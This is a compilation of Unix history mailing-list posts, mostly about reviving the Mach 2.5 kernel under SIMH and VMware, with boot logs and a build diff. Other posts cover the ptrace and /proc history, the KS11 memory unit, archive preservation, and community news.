Interesting, but hard to manage...
-Steve
For anyone that is interested, there are 2 files on Kirk’s DVD that don’t appear on the CDs:
mach.86-accent
mach.86
The smaller mach.86-accent is a few months newer than the other, and is strictly the kernel. mach.86 contains
stuff like the libraries for mach, bindings for pascal, along with an updated libc, and various binaries to run under
4.3BSD. It appears that the Mach project at that time was pretty much in step with the CSRG release.
Speaking of pascal, the early version of MIG is actually written in pascal. There is quite a bit of #ifdef ACCENT stuff in the code
as well. So the bindings are more than superficial.
I had a major issue trying to use RA81 disks on SIMH. Switching to RP06’s seemed to make things a
little more stable, but the larger issue seems to have been the async I/O code; disabling that increased stability
and reduced disk corruption greatly.
Setting up the build involved copying files from the ‘cs’ directory to their respective homes, along with the ‘mach/bin/m*’
commands to the /bin directory. Configuring the kernel is very much like a standard BSD kernel config; however, the directory
needs to exist beforehand, and instead of the config command on the path, you run the config command in the local directory.
I have been able to self-host a kernel, and build a good portion of the world, before I realized that the I/O was probably what I was
fighting; I went back, restored the 4.3 tape onto the HP’s, and just re-built the kernel to verify it works. For those
wanting the command for SIMH, it’s simply ‘set noasync’. The XU adapter worked out of the box with a simple:
set xu ena
att xu nat:tcp=42323:10.0.2.15:23
Which allowed me to telnet into the VAX, making things much easier than dealing with the console.
While this kernel does mention multiprocessor support, I haven’t quite figured out what models (if any) are supported
on the VAX, and whether SIMH emulates them. While http://www.oboguev.net/vax_mp/ has a very interesting-looking multiprocessor VAX
emulation, it’s a fictional model based on the MicroVAX, which I’m pretty sure 4.3BSD/Mach’86 is far too old for.
And for those who like the gratuitous dmesg, this is a self-hosted Mach build:
loading hp(0,0)boot
Boot
: hp(0,0)vmunix
393480+61408+138472 start 0x1fa5
Vax boot: memory from 0x92000 to 0x800000
Kernel virtual space from 0x80000000 to 0x82000000.
Mach/4.3/2/1 #1: compiled in /usr/mk/MACH on wb2.cs.cmu.edu at Mon Oct 20 12:54:42 1986
physical memory = 8.00 megabytes.
available memory = 5.86 megabytes.
using 408 buffers containing 0.79 megabytes of memory
VAX 11/780, serial#1234(0), hardware ECO level=7(0)
mcr0 at tr1
mcr1 at tr2
uba0 at tr3
zs0 at uba0 csr 172520 vec 224, ipl 15
ts0 at zs0 slave 0
dz0 at uba0 csr 160100 vec 300, ipl 15
de0 at uba0 csr 174510 vec 120, ipl 15
de0: hardware address 08:00:2b:0d:d1:48
mba0 at tr8
hp0 at mba0 drive 0
hp1 at mba0 drive 1
hp2 at mba0 drive 2
hp3 at mba0 drive 7
Changing root device to hp0a
I uploaded my SIMH config, along with the RP06 disk images here: https://sourceforge.net/projects/bsd42/files/4BSD%20under%20Windows/v0.4/Ma…
386BSD was released on this day in 1992, when William and Lynne Jolitz
started the Open Source movement; well, that's what my notes say, and
corrections are welcome (I know that Gilmore likes to take credit for just
about everything).
-- Dave
Many, many thanks to Clem Cole for arranging the 50th Unix Anniversary
celebration in Seattle last Wednesday. It was wonderful to see old
friends again. Most of these folks are still out in the world sharing
their brilliance in various computing facilities. Lots of very special
people still doing wonderful work! Thanks, Clem, for the chance to meet
up with them again!
Deborah
As there was a discussion on this list last week about various VMS+Unix projects from that era, maybe it is a good time to ask the question below again:
For a while I have been searching for a 1982 tech report from CSRG:
"TR/4 (Proposals for the Enhancement of Unix on the Vax)"
This report later evolved into TR/5, the 4.2BSD manual, but I’m specifically looking for TR/4.
The only reference that I have for TR/4 is contained in a 1982 discussion about VMS vs. Unix:
https://tech-insider.org/vms/research/1982/0111.html (look for message 5854 from Bill Mitchell).
Clutching at straws here, but maybe a copy survived in a box with VMS+Unix materials.
Wbr,
Paul
> From: Adam Thornton
> something designed for single-threaded composible text-filtering
> operations is now running almost all of the world's multithreaded
> user-facing graphical applications, but that's the vagaries of history
> for you.
It's a perfect example of my aphorism, "The hallmark of truly great
architecture is not how well it does the things it was designed to do, but how
well it does things it was never expected to handle."
Noel
Hunting around through my ancient stuff today, I ran across a 5.25"
floppy disk labeled as having old Usenet maps. These may have
historical interest.
First off, I don't recognize the handwriting on the disk. It's not mine.
Does anyone recognize it? (pic attached)
I dug out my AT&T 6300 (XT clone) from the garage and booted it up. The
floppy reads just fine. It has files with .MAP extension, which are
ASCII Usenet maps from 1980 to 1984, and some .BBM files which are ASCII
Usenet backbone maps up to 1987.
There is also a file whose extension is .GRF from 1983 which claims to
be a graphical Usenet map. Does anyone have any idea what GRF is or
what this map might be? I recall Brian Reid having a plotter-based
Usenet geographic map in 84 or 85.
I'd like to copy these files off for posterity. They read on DOS just
fine. Is there a current best practice for copying off files? I would
have guessed I'd need to use the serial port, but my old PC has DOS
2.11 (not much serial copying software on it) and I don't have anything
live with a serial port anymore. And it might not help with the GRF file.
I took some photos of the screen with the earliest maps (the ones that
fit on one screen.) So it's an option to type things in, at least for
the early ASCII ones.
Thanks,
Mary Ann
... of the pdp7 unix restoration activities. I could find the old unix72
ones at tuhs, but not the unix v0 archives. Can someone point me in the
right direction? A google search or 4 has turned up nothing. Has it been
archived somewhere?
Warner
Well I checked out Kirk’s site, and found out that he has a DVD to go along with the old 4 disc CD-ROM sets:
In the 20 years since the release of the CSRG CD-ROM Set (1998-2018) I have continued collecting old software which I have put together in two historic collections. The first is various historic UNIX distributions not from Berkeley. The second is programs and other operating systems that shipped on or influenced BSD. The distribution is contained on a single DVD that contains all the original content from the original 4-CD-ROM distribution, these two collections of historic software, and a copy of John Baldwin's conversion of the SCCS database contained on the original disk4 to a Subversion repository. Unlike most write-once technology which remains readable for less than ten years, this DVD is written using M-Disc technology which should last for centuries. The price for the DVD is $149.00.
I know the $150 USD may sound pricey, but the historic2 archive does contain a couple of additional copies of Mach!
And a bunch of other stuff as well; it’s gigabytes of stuff to go through.
Tom Van Vleck just passed this on the Multics mailing list. Fernando
Corbató has passed away at 93.
https://www.nytimes.com/2019/07/12/science/fernando-corbato-dead.html
Clem organized the wonderful Unix 50 event at the LCM two days ago, where
we saw a working 6180 front panel on display (backed by a virtual DPS-8m
running Multics!).
This is our heritage and our history, let us not forget where we came from.
- Dan C.
Interactive Systems. Now there’s a name I’ve not heard in many a year. Heinz Lycklama went there.
They did a couple of things: a straight UNIX port to various machines (PDP-11, 386) and also their “UNIX running under VMS” product.
They also had their own version of the Rand Editor called “INed” that was happiest on this hacked version of a Perkin Elmer terminal.
Early versions were PWB UNIX based if I recall.
My first job out of college was working with IS Unix on an 11/70 playing configuration management (essentially all the PWB stuff). I also hacked the line printer spooler and the .mm macro package to do classification markings (this was a part of a government contract).
A few years later I was given the job of porting Interactive Systems UNIX that was already running on an i386 (an Intel 310 system which had a Multibus I) to an Intel Multibus II box. Intel had already ported it once, but nobody seemed to be able to find the source code. So with a fresh set of the source code for the old system from IS, I proceeded to reverse engineer/port the code to the Message Passing Coprocessor. (Intel was not real forthcoming for documentation for that either). Eventually, I got it to work (the Multibus II really was a pleasant bus and worked well with UNIX). I went on to write drivers for a 9-track tape drive (which sat in my living room for a long time), a Matrox multibus II framebuffer (OK, that had problems), and a SCSI host adapter that was talking to this kludge device that captured digital data from a FLIR on uMatic cassettes (but that’s a different story).
In honor of the Unix 50 party tomorrow, I wrote an analysis of the
available data to conclude the first PDP-7 that Ken and Dennis used to
bring up Unix on was serial number 34. I've not seen this result elsewhere,
but if it's commonplace, please let me know.
https://bsdimp.blogspot.com/2019/07/the-pdp-7-where-unix-began.html
One surprise from the analysis: there was only one pdp-7 in the world that
could have run the original v0 unix. It's the only one that had the RB09
hard drive (though the asset list referenced in the article listed an RC09
on that system).
I hope you enjoy
Warner
Back in the day I had the pleasure of firing up what was possibly
the last North American BITNET node (certainly the last one on
NetNorth), on a Sun 3/xxx deskside server running SunOS 3.5(+).
(AUCS, at Athabasca U.)
I'm curious to know if the UREP source code that drove that link
ever escaped. I recall it being licensed code at the time, but
from academia vs. a commercial product. I don't know if that also
applied to the bisync serial driver.
--lyndon
> From: "Nelson H. F. Beebe"
> In our PDP-10 TOPS-20 archive of what was then utah-science .. I find
> these files:
Thanks very much for doing that search, and congratulations on finding them!
Not that I have the slightest interest/use in the results, but it's so good to
see historical software being saved.
Noel
Postal mail today brought me the latest issue of the IEEE Computing
Edge magazine, which presents short articles from other recent IEEE
publications. In it, there is an article with numerous mentions of
Doug McIlroy, early Unix, software tools, and software modularization:
Gerard J. Holzmann
Software Components
IEEE Computing Edge 5(7) (July 2019) 38--40
https://ieeexplore.ieee.org/document/8354432
[republished from IEEE Software 35(3) (May/June 2018) 80--82]
-------------------------------------------------------------------------------
- Nelson H. F. Beebe Tel: +1 801 581 5254 -
- University of Utah FAX: +1 801 581 4148 -
- Department of Mathematics, 110 LCB Internet e-mail: beebe(a)math.utah.edu -
- 155 S 1400 E RM 233 beebe(a)acm.org beebe(a)computer.org -
- Salt Lake City, UT 84112-0090, USA URL: http://www.math.utah.edu/~beebe/ -
-------------------------------------------------------------------------------
I wouldn't call it an error, merely a misleading sentence. .EX/.EE is,
after all, an extension in Gnu, albeit not original to Gnu. And I
didn't intend to impugn anybody. The sentence, "Ingo Schwarze stated
incorrectly" was apparently slipped into the quotation to provide
missing context. I do appreciate, however, how quickly the
inexactness was repaired.
Doug
| Doug McIlroy wrote on Mon, Jul 08, 2019 at 11:17:32PM -0400:
| > Ingo Schwarze stated incorrectly:
|
| >> EE This is a non-standard GNU extension. In mandoc(1), it does the
| >> same as the roff(7) fi request (switch to fill mode).
|
| >>
| >> EX This is a non-standard GNU extension. In mandoc(1), it does the
| >> same as the roff(7) nf request (switch to no-fill mode).
|
| > "Gnu extension" should be read as "extension adopted by Gnu".
| > .EX/.EE was introduced in 9th Edition Unix.
|
| Thank you for pointing out the error, i corrected the manual page
| in OpenBSD and in portable mandoc, see the commit below.
Just synced my personal copy with the tuhs archive.
Looks like there are a lot of Mac preview files (that start with ._) mixed
in. Is that on purpose?
Warner
Dear all,
Apologies for this semi-spam message from a long-time appreciator of classic computers and nostalgic obsolete products, but I hope this will be of interest to at least a few people here.
So, yes, by way of context, I've been acquiring what I consider to be characterful and/or historically interesting computers for coming up to, maybe, 15 years now, with the intention of being able to curate multiple, interactive temporary exhibits on the history of computing, but since moving continents (amongst other things), my paths and passions have changed, so I am currently in the process of re-testing (and repairing) my machines, and will be trying to sell them off in the coming weeks and months. Under different circumstances, finding people (or groups) with similar interests and plans would have been an equal-first priority, but given my more recent 'life changes', sale price — and the ability to better pursue my new focuses — is now more of a factor.
(That said, if you are (or know) a developer of an open source machine emulator who could use one of these machines --- particularly one of the more obscure ones --- please do get in touch, as the prospect of people being able to keep older / rarer operating systems and software running once the physical machines are no longer available or working /is/ actually still kinda important to me, and I'd be open to a lower price and/or setting up some remote access with some kind of kludged-together iLO and vaguely 'dual-ported' disk access via, e.g., an SD2SCSI setup.)
But before I list them on eBay (and/or by way of a heads up), I wanted to let people here know, just in case I have something that someone here particularly wants / needs / could use. The current list of systems I will be parting with is accessible at https://docs.google.com/spreadsheets/d/1QqUrO11gnn4fwAPDxqO_phKDt1M0O15G7wJ… but some (hopefully) highlights include (*big breath*):
DEC: MicroPDP-11/53+; MicroVAX 2000; VAXstation 4000 VLC/60/90A/96; VAX 4000 100A, 105; DECstation 5000/240, 260 (MIPS-based); DEC 3000/300X; Personal Workstation 600au; AlphaServer 4100; AlphaServer DS20, DS25 systems; Letterwriter 100; VT 101, 220, 520 terminals
HP: HP rx2800 Integrity2; 9000 715/100 and Visualize C110 PA-RISC systems
SGI: Indy and O2 systems
SUN: ELC, SPARCstation Voyager (the portable one), 5 and 20; Ultra 1; Ultra 5; Netra T1-105; Enterprise T5240
Apple: IIc, IIe Platinums, IIgs; Mac 512ke, Mac Pluses; SE/30 and Quadra 700s (also for running A/UX); iMac G3s and a G4
Commodore: PET 3000 systems, PET 8032-SK; various C64 / C64C and 128D systems; SX-64; Music Maker keyboards (the big one, inc. SFX modules); Amiga 1000
Apologies again, please feel free to contact me with any queries or reasonable offers, or even if you'd just like to be kept in the loop as more machines become available, and all the best.
Thanks in advance,
Peter
P.S. In light of the responses I've received to posts I've made elsewhere, I've included a 'Default Reserve' price in the aforementioned spreadsheet. I've written more about this there, but the gist of it is that, given that very few of the more obscure / awesome machines have gone through eBay recently, it's kinda hard for me to gauge what a fair and reasonable (to me and the future buyers) price is for quite a few of my machines --- I've started to put in rough figures for /some/ of them based upon 'what feels right', but if there's nothing there, please don't ask me what I might want for them as I don't know yet (though do feel free to make me an offer). Thanks again!
As promised here is the diff & misc info on the build. I installed the Mt Xinu disks to create a build environment and uucp’d the sources from CD#4 of Kirks’ CSRG set (/local/MACH/386/sys).
Grepping the source reveals it to be MK35, which makes sense from the release notes, as this was an i386-only release:
------8<------8<------8<------8<
***** MK Version MK35 (rvb) *****
This is an I386 architecture release only. It has been tested
on an AT as well as the hypercube.
No New features:
--- --------
Except possibly that the if_pc586.c is not timing dependent
any more.
The big deal about this release is that all the files in the
i386at directory and the files in Mach2.5 I386q are identical --
that is all improvements in the mainline have been merged to
the 3.0 code and vice versa. NOTE: the 3.0 com driver has
not been tested cause I did not have any hardware. Also I
have lpr and if_par drivers that I did not even install for
the same reason. (I needed to install com.c for the mouse
support code.)
ALSO, this release has the Prime copyrights changed to something
less threatening, courtesy of Prime Computer Inc.
Bug fix:
The panic that rfr reported with the ram_to_ptr is no longer
possible.
------8<------8<------8<------8<
For people who like DMESG’s here it is:
------8<------8<------8<------8<
boot:
442336+46792+115216[+38940+39072]
Insert file system
Sÿ boot: memory from 0x1000 to 0x7d0000
Kernel virtual space from 0xc0000000 to 0xc25d0000.
Available physical space from 0xa000 to 0x7d0000
i386_init: virtual_avail = c07d0000, virtual_end = c25d0000
end c01938d8, sym c01938dc(981c) str = c019d0f8(98a4)
[ preserving 78016 bytes of symbol table ]
Mach/4.3 #5.1(I386x): Wed Jan 20 00:45:55 WET 1988; obj/STD+WS-afs-nfs (localhost)
physical memory = 7.81 megabytes. vm_page_free_count = 689
using 200 buffers containing 0.78 megabytes of memory
available memory = 5.55 megabytes. vm_page_free_count = 58e
fdc0: port = 3f2, spl = 5, pic = 6.
fd0: port = 3f2, spl = 5, pic = 6. (controller 0, slave 0)
fd1: port = 3f2, spl = 5, pic = 6. (controller 0, slave 1)
com0: port = 3f8, spl = 6, pic = 4. (DOS COM1)
lpr0: port = 378, spl = 6, pic = 7.
par0: port = 378, spl = 6, pic = 7.
root on `b
------8<------8<------8<------8<
The diff from the CD is as follows:
------8<------8<------8<------8<
jsteve@2006macpro:/mnt/c/temp/csrg$ diff -ruN sys mach25-i386
diff -ruN sys/Makeconf mach25-i386/Makeconf
--- sys/Makeconf 1970-01-01 08:00:00.000000000 +0800
+++ mach25-i386/Makeconf 2019-06-24 15:24:49.000000000 +0800
@@ -0,0 +1,102 @@
+#
+# Mach Operating System
+# Copyright (c) 1989 Carnegie-Mellon University
+# All rights reserved. The CMU software License Agreement specifies
+# the terms and conditions for use and redistribution.
+#
+#
+# HISTORY
+# $Log: Makeconf,v $
+# Revision 2.16 91/09/25 18:51:17 mja
+# Fix VAX_CONFIG so that processor number component is last (for
+# SUP wild-carding to work); make MMAX_CONFIG consistent with
+# other platforms as STD+ANY+EXP+64.
+# [91/09/25 18:41:59 mja]
+#
+# Revision 2.15 91/09/24 20:07:07 mja
+# Require new ${KERNEL_SERIES} macro in place of old ${RELEASE}
+# even to specify the "latest" series; add temporary
+# ${ENVIRON_BASE}; add silent include of Makeconf-local.
+# [91/09/22 03:16:36 mja]
+#
+# Add SITE; set SOURCEDIR to MASTERSOURCEDIR if present (for build).
+# [91/09/21 18:06:08 mja]
+#
+# Revision 2.14 91/08/30 09:37:19 berman
+# Set up default config for MMAX which is STD+MP (multiprocessor)
+# [91/07/30 12:19:40 ern]
+#
+# Revision 2.13 91/04/02 16:04:53 mbj
+# Added {I,AT}386_CONFIG=STD+WS+EXP lines.
+# Changed ${MACHINE} references to ${TARGET_MACHINE}.
+#
+# Revision 2.12 90/08/30 12:24:52 bohman
+# Changes for mac2.
+# [90/08/28 bohman]
+#
+# Revision 2.11 89/09/25 22:43:32 mja
+# Correct mis-merged OBJECTDIR.
+#
+# Revision 2.10 89/09/25 22:20:03 mja
+# Use SOURCEDIR instead of VPATH for shadowing. This means we
+# can do away with the SRCSUFFIX stuff which "make" does by
+# itself, and that Makefiles can use VPATH themselves. I also
+# "simplified" the definition of CONFIG and "release_...".
+# [89/07/06 bww]
+#
+# Revision 2.9 89/08/08 21:44:58 jsb
+# Defined PMAX_CONFIG.
+# [89/08/03 rvb]
+#
+# Revision 2.8 89/07/12 23:02:52 jjc
+# Defined SUN4_CONFIG.
+# [89/07/12 23:01:03 jjc]
+#
+# Revision 2.7 89/04/10 00:34:59 rpd
+# Changed OBJECTDIR name to correspond to new organization.
+# [89/04/06 mrt]
+#
+# Revision 2.6 89/02/25 14:12:18 gm0w
+# Changes for cleanup.
+#
+# Revision 2.5 89/02/25 14:08:30 gm0w
+# Changes for cleanup.
+#
+# Revision 2.4 88/11/14 15:04:01 gm0w
+# Changed the standard configurations to correspond
+# to the new names.
+# [88/11/02 15:45:44 mrt]
+#
+# Revision 2.3 88/09/07 15:44:43 rpd
+# Moved CONFIG macros here from Makefile, so that the user
+# can easily customize them by modifying Makeconf.
+# [88/09/07 01:52:32 rpd]
+#
+# Revision 2.2 88/07/15 15:11:46 mja
+# Created.
+#
+
+VAX_CONFIG = STD+ANY+EXP+16
+mac2_CONFIG = MACMACH-macos_emul
+I386_CONFIG = STD+WS+EXP
+AT386_CONFIG = STD+WS+EXP
+MMAX_CONFIG = STD+ANY+EXP+64
+
+#CONFIG = ${${TARGET_MACHINE}_CONFIG?${${TARGET_MACHINE}_CONFIG}:STD+ANY+EXP}
+#CONFIG = STD+WS+EXP-afs-nfs
+CONFIG = STD+WS-afs-nfs
+
+SITE = CMUCS
+
+SOURCEDIR = ${MASTERSOURCEDIR?${MASTERSOURCEDIR}:${SRCBASE}}
+
+#OBJECTDIR = ../../../obj/@sys/kernel/${KERNEL_SERIES}
+OBJECTDIR = ./obj
+
+# XXX until build is fixed to set these XXX
+ENVIRON_BASE = ${RELEASE_BASE}
+
+.EXPORT: ENVIRON_BASE
+
+# Provide for private customizations in a shadow directory
+-include Makeconf-local
diff -ruN sys/Makefile mach25-i386/Makefile
--- sys/Makefile 2016-08-08 14:37:11.000000000 +0800
+++ mach25-i386/Makefile 2019-06-24 15:24:49.000000000 +0800
@@ -206,6 +206,12 @@
at386_cpu=i386
sun4_cpu=sun4
cpu=$(${machine}_cpu)
+#echo "CPU IS $cpu"
+AT386_cpu=i386
+I386_cpu=i386
+cpu=${${TARGET_MACHINE}_cpu?${${TARGET_MACHINE}_cpu}:${target_machine}}
+#echo "CPU IS $cpu"
+
VAX_OUTPUT=Makefile
SUN_OUTPUT=Makefile
diff -ruN sys/conf/newvers.sh mach25-i386/conf/newvers.sh
--- sys/conf/newvers.sh 2016-08-08 14:37:11.000000000 +0800
+++ mach25-i386/conf/newvers.sh 2019-06-24 15:25:15.000000000 +0800
@@ -56,8 +56,17 @@
v="${major}.${minor}(${variant}${edit}${patch})" d=`pwd` h=`hostname` t=`date`
CONFIG=`cat vers.config`
if [ -z "$d" -o -z "$h" -o -z "$t" -o -z "${CONFIG}" ]; then
- exit 1
+# exit 1
+edit="386"
+major=5
+minor=1
+variant="I"
+patch="x"
+copyright="/copyright.txt"
+v="${major}.${minor}(${variant}${edit}${patch})" d=`pwd` h=`hostname` t=`date`
fi
+#
+
d=`expr "$d" : '.*/\([^/]*\)/[^/]*$'`/${CONFIG}
(
/bin/echo "int version_major = ${major};" ;
diff -ruN sys/i386/start.s mach25-i386/i386/start.s
--- sys/i386/start.s 2016-08-08 14:37:11.000000000 +0800
+++ mach25-i386/i386/start.s 2019-07-01 23:47:25.208021800 +0800
@@ -210,13 +210,14 @@
lgdt (%eax)
+ / flip cr3 before you flip cr0
+ mov %edx, %cr3
+
/ turn PG on
mov %cr0, %eax
or $PAGEBIT, %eax
mov %eax, %cr0
- mov %edx, %cr3
-
ljmp $KTSSSEL, $0x0
/ *********************************************************************
diff -ruN sys/standi386at/boot/disk.c mach25-i386/standi386at/boot/disk.c
--- sys/standi386at/boot/disk.c 2016-08-08 14:37:11.000000000 +0800
+++ mach25-i386/standi386at/boot/disk.c 2019-07-01 23:51:11.261850100 +0800
@@ -340,11 +340,11 @@
#ifndef FIND_PART
*rel_off = vp->part[part].p_start;
- if (vp->part[part].p_tag != V_ROOT)
+ if (vp->part[part].p_flag != V_ROOT)
printf("warning... partition %d not root\n", part);
#else
for (i = 0; i < vp->nparts; i++)
- if (vp->part[i].p_tag == V_ROOT)
+ if (vp->part[i].p_flag == V_ROOT)
break;
if (i == vp->nparts) {
------8<------8<------8<------8<
I finally got a chance to talk to someone who knows a hell of a lot more about the i386 than I could ever hope to know. I gave him all the materials, and I think he spent more time replying to my email than doing the debugging.
Basically, the two register loads for entering protected mode with paging were in the wrong order: CR3 has to be loaded with the page-directory base before the PG bit is set in CR0. This is kind of funny, as the port was done by Intel of all people.
Anyway, I reversed them, and I now have the Mach kernel from 1988 booted under VMware.
I have to say that it's super cool to finally have chased this one down.
Does anyone know whether CMU’s local Mach sources have been preserved?
I’m not just talking about MK84.default.tar.Z and so on, I’m talking about all the bits of Mach that were used on cluster systems on campus, prior to the switch to vendor UNIX.
I know at least one person who had complete MacMach sources for the last version, but threw out the backup discs with the sources in the process of moving. So I know they exist.
If nothing else, CMU did provide other sites their UX source package (eg UX42), which was the BSD single server environment. So I know that has to be out there, somewhere.
— Chris
Sent from my iPhone
All, a while back Debbie Scherrer mailed me a copy of a
"Software Tools Users Group" archive, and I've been sitting on my
hands and forgetting to add it to the Unix Archive. It's now here:
https://www.tuhs.org/Archive/Applications/Software_Tools/STUG_Archive/
The mirrors should pick it up soon. I've gzipped most of it as I'm getting
a bit tight on space.
Thanks to Debbie for the copy and to her and Clem for reminding me to
pull my finger out :)
Cheers, Warren
It's interesting that this comment about ptrace was written
as early as 1980.
Ron Minnich's reference to Plan 9 /proc misses the mark, though.
By the time Plan 9 was written, System V already had /proc; see
https://www.usenix.org/sites/default/files/usenix_winter91_faulkner.pdf
And as the authors say, the idea actually dates back to Tom Killian's
/proc in Research UNIX. I don't know when Tom's code first went
live, but I first heard about it by seeing it in action on my first
visit to Bell Labs in early 1984, and it was described in public in
a talk at the Summer 1984 USENIX conference in Salt Lake City.
I cannot quickly find an online copy of the corresponding paper;
pointers appreciated. (Is there at least an online index of BTL
CSTRs? The big search engine run by the place that still has
some 1127 old-timers can't find that either.)
As for ptrace itself, I heartily agree that /proc made it obsolete.
So did everyone else in 1127 when I was there, but nobody wanted
to update adb and sdb, which were big messes inside. So I did,
attempting a substantial internal makeover of adb to ease making
versions for different systems and even cross-versions, but just
a quick hack for sdb.
Once I'd done that and shipped the new adb and sdb binaries to
all our machines, I removed the ptrace call from the kernel.
It happened that in the Eighth (or was it Ninth by then? I'd
have to dig out notes to find out) Edition manual, ptrace(2)
was on two facing pages. To celebrate, I glued said pages
together in the UNIX Room's copy of the manual.
Would it were so easy to take out the trash today.
Norman Wilson
Toronto ON
The paper I am thinking of (gee, I wish I could remember any other details
about it...) was *very* detailed and specific, and was hardware-specific
to either the PDP-11 or VAX. It would not at all be applicable to Linux
or any kind of modern OS.
I am wondering if it is something in the Leffler et al book, I'll have to
go back and review that. I'll have to find my copy of it first...
--Pat.
A few bods have asked to see this, so... Actually, "extracted" would be
a better description than "redacted", but it's too late now; I could rename
it and put in a CGI-redirect, but I'm too busy at the moment.
-----
A redacted copy of my complaint to T$.
www.horsfall.org/Telstra-comp-redact.rtf (yes, RTF; it was written on a
Mac).
Utterly inexcusable... Please share etc :-)
-- Dave
Ptrace was short-lived at Research, appearing in 6th through 8th editions.
/proc was introduced in the 8th. Norman axed it in the 9th.
Norman wrote:
nobody wanted
to update adb and sdb, which were big messes inside. So I did
...
Once I'd done that and shipped the new adb and sdb binaries to
all our machines, I removed the ptrace call from the kernel.
doug
> From: ron minnich <rminnich(a)gmail.com>
> To: TUHS main list <tuhs(a)minnie.tuhs.org>
> Subject: [TUHS] 4.1c bsd ptrace man entry ("ptrace is unique and
> arcane")
> Message-ID:
> <CAP6exYJshbA5HxOJ_iM21Cs0Y4vGfLuFigXxh4WTeqbZreY8UA(a)mail.gmail.com>
> Content-Type: text/plain; charset="UTF-8"
>
> I always wondered who wrote this, anyone know? I have my suspicions but ...
>
> ".SH BUGS
> .I Ptrace
> is unique and arcane; it should be replaced with a special file which
> can be opened and read and written. The control functions could then
> be implemented with
> .IR ioctl (2)
> calls on this file. This would be simpler to understand and have much
> higher performance."
>
> it's interesting in the light of the later plan 9 proc interface.
>
> ron
The manual pages were not yet under SCCS, so the best time gap that I
can give you is that the above text was added between the release of
3BSD (Nov 1979) and 4.0BSD (Nov 1980). Most likely it was Bill Joy
that made that change.
Kirk McKusick
I always wondered who wrote this, anyone know? I have my suspicions but ...
".SH BUGS
.I Ptrace
is unique and arcane; it should be replaced with a special file which
can be opened and read and written. The control functions could then
be implemented with
.IR ioctl (2)
calls on this file. This would be simpler to understand and have much
higher performance."
it's interesting in the light of the later plan 9 proc interface.
ron
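For concreteness, here is a minimal Linux-flavored sketch of the "special file" idea that BUGS note describes: process memory as an ordinary file that can be opened, seeked, and read. It reads the process's own /proc/self/mem to sidestep attach-permission issues; a real debugger would open /proc/<pid>/mem of a traced child instead. This is purely an illustration of the interface, not of any historical /proc implementation.
------8<------8<------8<------8<
/* proc_mem.c - read a variable in our own address space through
 * /proc/self/mem, illustrating "process memory as a file".
 * Linux-specific sketch; a debugger would open /proc/<pid>/mem of a
 * traced child instead (which needs ptrace-attach or equivalent).
 */
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    static int secret = 42;          /* the word we will "peek" at */
    int peeked = 0;

    int fd = open("/proc/self/mem", O_RDONLY);
    if (fd == -1) {
        perror("/proc/self/mem");
        return 1;
    }
    /* the variable's address is simply an offset into the "file" */
    if (pread(fd, &peeked, sizeof peeked,
              (off_t)(uintptr_t)&secret) != (ssize_t)sizeof peeked) {
        perror("pread");
        return 1;
    }
    printf("peeked value = %d (expected %d)\n", peeked, secret);
    close(fd);
    return 0;
}
------8<------8<------8<------8<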
Hi All.
Scott Lee, who worked with me on the Georgia Tech Software Tools
Subsystem for Pr1me Computers, recently unearthed two tapes with
some version of that software. These may be the only copies
extant anywhere.
He says:
| I was cleaning out the basement of my house. They're 35 years old, but
| they've never been left in the heat or anything. I opened one of them
| up and checked the tape and it's not self-sticky or anything. The odds
| that they're readable is slim, because old 9-track bits tended to bleed
| through each other. You were supposed to spin through the tape every
| couple of years to make them last longer. That's obviously not happened.
There was discussion here a while back about services that will
recover such tapes and so on. But I didn't save any of that information.
If you have information, PLEASE send it to me so that I can relay it
to Scott.
Dennis Boone & Bill Gunshannon (are you on this list?) - I may ask you
to contribute $$ towards this once I know more.
Thanks!
Arnold
> From: Andrew Warkentin
> Mach and the other kernels influenced by it basically destroyed the
> reputation of microkernels ... a simple read() of a disk file, which is
> a single kernel call on a monolithic kernel and usually two context
> switches on QNX, takes at least 8 context switches - client->VFS->disk
> FS->partition driver->disk driver and back again).
Hammer-nail syndrome.
When the only tool you have for creating separate subsystems is processes, you
wind up with a lot of processes. Who'd a thunk it.
A system with a segmented memory which allows subroutine calls from one subsystem
to another will have a lot less overhead. It does take hardware support to be
really efficient, though. The x86 processors had that support, until Intel dropped
it from the latest ones because nobody used it.
Excuse me while I go bang my head on a very hard wall until the pain stops.
Noel
This is an appeal to the few really-old-timers (i.e. who used the PDP-11/20
version of Unix) on the list to see if they remember _anything_ of the KS11
memory mapping unit used on that machine.
Next to nothing is known of the KS11. Dennis' page "Odd Comments and Strange
Doings in Unix":
https://www.bell-labs.com/usr/dmr/www/odd.html
has a story involving it (at the end), and that is all I've ever been able
to find out about it.
I don't expect documentation, but I am hoping someone will remember
_basically_ what it did. My original guess as to its functionality, from that
page, was that it's not part of the CPU, but a UNIBUS device, placed between
the UNIBUS leaving the CPU, and the rest of the bus, which perhaps mapped
addresses around (and definitely limited user access to I/O page addresses).
It might also have mapped part of the UNIBUS space which the -11/20 CPU _can_
see (i.e. in the 0-56KB range) up to UNIBUS higher addresses, where 'extra'
memory is configured - but that's just a guess. It is an example of the
kind of info I'd like to find out about it - just the briefest of high-level
descriptions would be an improvement on what little we have now!
On re-reading that page, I see it apparently supported some sort of
user/kernel mode distinction, which might have required a tie-in to the
CPU. (But not necessarily; if there was a flop in the KS11 which stored the
'CPU mode' bit, it might be automatically cleared on all interrupts. Not sure
how it would have handled traps, though.)
Even extremely dim memories will be an improvement on the blank canvas we
have now!
Noel
> From: Rudi Blom
> Probably already known, but to be sure Interesting options: MX11 -
> Memory Extension Option: this enabled the usage of 128 KW memory (18-bit
> addressing range)
Actually, I didn't know of that; something else to track down. Wrong list
for that, though.
Noel
Probably already known, but to be sure
Interesting options: MX11 - Memory Extension Option: this enabled the
usage of 128 KW memory (18-bit addressing range); KS11: this option
provided hardware memory protection, which the plain /20 lacked. Both
options were developed by the Digital CSS (Computer Special Systems).
http://hampage.hu/pdp-11/1120.html
PS: the page listed below has a very nice picture of the 'two fathers of UNIX' working on a PDP-11/20:
http://hampage.hu/unix/unix1.html
Kevin Bowling:
The conference looks supremely uninteresting outside one WAFL talk to me.
====
That is, of course, a matter of opinion. Just from skimming
titles I see about two dozen talks of at least some interest
to me in the ATC program. And that's just ATC; I'm planning
to attend the Hot* workshops on Monday and Tuesday as well.
Of course I won't attend every one of those talks--some coincide
in time, some I'll miss because I get stuck in the hallway track.
And some will prove less interesting in practice, though others
that don't seem all that interesting in the program will likely
prove much better in person.
I've been attending USENIX ATC for decades, and although some
conferences have been meatier than others, I've never ended up
feeling the trip was a waste of time.
